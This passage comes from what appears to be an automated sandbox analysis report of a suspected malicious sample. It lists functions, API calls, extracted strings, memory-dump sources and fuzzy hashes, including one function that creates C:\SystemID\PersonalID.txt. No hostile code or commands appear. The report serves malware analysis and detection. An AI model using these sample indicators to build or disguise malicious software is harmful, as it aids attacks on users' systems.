                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: .\crypto\err\err.c$unknown
                                                                                                                                                    • API String ID: 0-565200744
                                                                                                                                                    • Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                                                                                    • Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
                                                                                                                                                    • Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                                                                                    • Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0042A77E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
                                                                                                                                                    • ___raise_securityfailure.LIBCMT ref: 0042AC7A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                    • String ID: 8Q
                                                                                                                                                    • API String ID: 3761405300-2096853525
                                                                                                                                                    • Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                                                                                    • Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
                                                                                                                                                    • Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                                                                                    • Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040C919 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _fputws$CreateDirectory
                                                                                                                                                    • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                                                    • API String ID: 2590308727-54166481
                                                                                                                                                    • Opcode ID: a8394b3a70a4d6a3136c362a99d12b854317469571ff5e0108eeca55942cb720
                                                                                                                                                    • Instruction ID: 548e7949761e073c688dfdb6472f733b12cf2ebad02737ba307de427565b7e5f
                                                                                                                                                    • Opcode Fuzzy Hash: a8394b3a70a4d6a3136c362a99d12b854317469571ff5e0108eeca55942cb720
                                                                                                                                                    • Instruction Fuzzy Hash: 9911E672A00315EBCF20DF65DC8579A77A0AF10318F10063BED5962291E37A99588BCA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00420DB3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • Assertion failed: %s, file %s, line %d, xrefs: 00420E13
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __calloc_crt
                                                                                                                                                    • String ID: Assertion failed: %s, file %s, line %d
                                                                                                                                                    • API String ID: 3494438863-969893948
                                                                                                                                                    • Opcode ID: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                                                                                                                                                    • Instruction ID: 3c5265aa1bf4e9f5ad4874ec33d215fa8746995624eee7e22a7137551c8458fa
                                                                                                                                                    • Opcode Fuzzy Hash: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                                                                                                                                                    • Instruction Fuzzy Hash: 75F0A97130A2218BE734DB75BC51B6A27D5AF22724B51082FF100DA5C2E73C88425699
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00480620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 00480686
                                                                                                                                                      • Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18
                                                                                                                                                    Strings
                                                                                                                                                    • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
                                                                                                                                                    • .\crypto\evp\digest.c, xrefs: 00480638
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset_raise
                                                                                                                                                    • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                                                                    • API String ID: 1484197835-3867593797
                                                                                                                                                    • Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                                                                                    • Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
                                                                                                                                                    • Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                                                                                    • Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%